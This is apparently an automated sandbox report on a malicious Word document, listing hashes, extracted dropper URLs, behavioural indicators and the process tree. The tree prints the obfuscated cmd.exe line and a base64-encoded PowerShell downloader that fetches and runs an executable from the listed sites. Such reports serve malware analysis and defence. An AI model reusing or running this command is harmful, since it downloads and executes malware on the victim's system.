Analysis
-
max time kernel
43s -
max time network
36s -
platform
windows7_x64 -
resource
win7v200217 -
submitted
15-03-2020 17:25
Static task
static1
General
-
Target
0855da5a6db49a1d2043493d292f3282845b92d4b1d4f6c55eea9026cfcda488.doc
-
Size
87KB
-
MD5
e416aa320c5070df1128c8d44872aeab
-
SHA1
b2c6e3255697811c32bc7b461d161b9398e93a8f
-
SHA256
0855da5a6db49a1d2043493d292f3282845b92d4b1d4f6c55eea9026cfcda488
-
SHA512
8bd6ad269772e114766398c075312ac931c1fd1386887a1854336858bf0aa10fac3fd499b914e62027fd39fb40a0d8f6bd4f0fc73a1f9060e9fa78d79c269123
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://freshnlaundry.com/MmU
exe.dropper
http://bravewill.org/5VKAhr
exe.dropper
http://ypsifest.com/xbrYo
exe.dropper
http://nazarspot.com.tr/dTofA3
exe.dropper
http://suicidepreventionportagecounty.org/J5
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
CMd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1956 1868 CMd.exe WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1980 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1980 powershell.exe 1980 powershell.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1868 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1868 WINWORD.EXE 1868 WINWORD.EXE -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
CMd.exepid process 1956 CMd.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WINWORD.EXEdescription pid process target process PID 1868 wrote to memory of 1956 1868 WINWORD.EXE CMd.exe PID 1868 wrote to memory of 1956 1868 WINWORD.EXE CMd.exe PID 1868 wrote to memory of 1956 1868 WINWORD.EXE CMd.exe -
Blacklisted process makes network request 7 IoCs
Processes:
powershell.exeflow pid process 5 1980 powershell.exe 7 1980 powershell.exe 9 1980 powershell.exe 10 1980 powershell.exe 11 1980 powershell.exe 13 1980 powershell.exe 15 1980 powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Processes:
powershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0855da5a6db49a1d2043493d292f3282845b92d4b1d4f6c55eea9026cfcda488.doc"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\CMd.exeCMd /v^ ^ /C " Set^ ^ ^I^F^=xo^@^{r^}[{^l^l -^{^ ^JA^B^QAE(^AU^@A^%^A^G4AZ^QB3AC^0Ab@BiAGo^A^ZQBj^A^H^Q^A#A^B^O^A^G^U^A^d^A^A^uAFcAZ^QB^i^AE^M^Ab^AB^x^A^G^UAbg^B0^AD^}A^J^AB^aAEMA^d^@^A^%^ACc^Aa^AB^0A^HQAcAA^6^AC(A^L@^B+AH^#A^Z^Q^Bz^AGg^Abg^B^}^A^G^EA^d^Q^Bu^AGQAc^gB^5^AC^4A^Y@BvAG0A^L@B^'^A^G^0^AVQ^BA^AGgAd^AB^0^AHA^A^Og^AvAC(AY^gBy^AGEAdgB^l^AHc^A^aQB^}^A^G@AL^g^Bv^AH^#^A^Z^@Av^ADUAVg^BL^A^EEAaAB^yAEAAa^AB^0A^HQAcA^A^6^AC(^A^L^@B^5^AHAAc@^B^x^A^G^YA^ZQB^zA^HQAL^gB^jAG(AbQ^Av^AHg^AY^g^B^yAF^k^A^b^@^B^A^AGg^A^d^A^B0^AHAA^O^gAvAC(^Ab^gB[^A^H^o^A^Y^Q^B^y^A^HM^AcABv^AH^Q^A^L^gB^jA^G(AbQAu^A^H^QAc^gAvA^GQ^AV^A^Bv^AGY^AQQ^A^zA^EAAa^A^B^0A^HQAcA^A6AC(^AL@Bz^A^HU^A^a^Q^Bj^AGkA^Z^A^B^l^A^HA^AcgBlAHY^A^ZQB^u^A^HQA^a^Q^Bv^A^G^4^Ac^ABvA^H#AdA^B^[A^GcAZ^Q^Bj^A^G(^AdQ^B^u^AH^QA{QA^u^AG(^Acg^Bn^AC(A^SgA1^ACcA^L^g^BTA^HA^A^b^A^B^x^A^HQ^AK^AAnAEAA^J@^AxA^D}AJAB^+A^EYAVgAg^AD0^A#^A^AnA^DgA^M@^A^,ACc^A^O^@AkAF^UA{gB^xA^D0^AJABlAG4A^d^gA6A^HAA^dQB^i^AG@^A^aQBj^AC}^AJ@^BcACcAK^@A^k^AG^YARg^B^WAC}A^J@AuA^G^U^A^{ABlACc^A^O@^B+^AG(AcgB^lAG^E^AY@Bo^AC^g^A^JA^Br^AE^Y^AWgAg^A^G^k^A^bgAgACQAW^g^BD^AHc^A^KQ^B7AH^Q^Ac^g^B5AH}^AJ^A^BQ^AE(^AU^@^AuAE^QAb@B^3^A^G^4Ab^ABv^AG^E^A^Z^A^BGA^G^kA^b^A^B^l^AC^gAJA^Br^A^E^Y^AWgA^}AC^A^AJA^BV^A^H^oA^a^QA^x^A^D^}^AS^Q^B^uA^H^YAb^@BrAG^UA^LQBJA^HQA^ZQB^9^ACA^AJABVA^HoAa^QA^7A^G^#Ac^gB^l^AGEAa^@^A7^AH0^A^Y@B[^A^H^Q^A^Y^@^Bo^A^H^}A)QB^%^AC^A^A^#^AAg^ACA^A^#^A^AgAC^A^A#^AA^g^ACA^A^#^AA^g^AC^AA^#AA^g^ACA^A^#A^A=&& S^Et ^ j^Z^oY=!IF^:9=^t^!&& se^t ^ ^ ^UJ^b=^!j^Z^o^Y^:%=^9^!& S^E^T X^G^u=^!^U^J^b:)^=^f^!&& Se^T h^1^Q^2=^!X^G^u^:^x^=^p!&& Se^t ^ ^ ^SO^8Q=^!h^1^Q^2^:^#=I^!&& s^e^t ^ ^ ^gS=^!^SO^8Q^:(^=^8^!&& se^t ^p^9r=!^g^S^:^{=^e!&& S^Et ^ ^d^z=^!^p^9r^:^@^=^w^!&& SeT ^ ^K^S0=^!^d^z:^,^=2^!&& S^ET ^ D^x^8k=!^K^S0^:^'^=N^!&& s^E^T xF0=!D^x^8^k^:^[^=h!&&S^E^t ^ fd^b^t=!^x^F^0^:^+^=^m!& s^e^t ^ r^HV^e=^!^f^d^b^t^:^}^=^s^!&c^a^ll %r^HV^e% "2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABQAE8AUwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABaAEMAdwA9ACcAaAB0AHQAcAA6AC8ALwBmAHIAZQBzAGgAbgBsAGEAdQBuAGQAcgB5AC4AYwBvAG0ALwBNAG0AVQBAAGgAdAB0AHAAOgAvAC8AYgByAGEAdgBlAHcAaQBsAGwALgBvAHIAZwAvADUAVgBLAEEAaAByAEAAaAB0AHQAcAA6AC8ALwB5AHAAcwBpAGYAZQBzAHQALgBjAG8AbQAvAHgAYgByAFkAbwBAAGgAdAB0AHAAOgAvAC8AbgBhAHoAYQByAHMAcABvAHQALgBjAG8AbQAuAHQAcgAvAGQAVABvAGYAQQAzAEAAaAB0AHQAcAA6AC8ALwBzAHUAaQBjAGkAZABlAHAAcgBlAHYAZQBuAHQAaQBvAG4AcABvAHIAdABhAGcAZQBjAG8AdQBuAHQAeQAuAG8AcgBnAC8ASgA1ACcALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABmAEYAVgAgAD0AIAAnADgAMwA2ACcAOwAkAFUAegBpAD0AJABlAG4AdgA6AHAAdQBiAGwAaQBjACsAJwBcACcAKwAkAGYARgBWACsAJwAuAGUAeABlACcAOwBmAG8AcgBlAGEAYwBoACgAJABrAEYAWgAgAGkAbgAgACQAWgBDAHcAKQB7AHQAcgB5AHsAJABQAE8AUwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABrAEYAWgAsACAAJABVAHoAaQApADsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABVAHoAaQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAfQB9ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA=3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Modifies system certificate store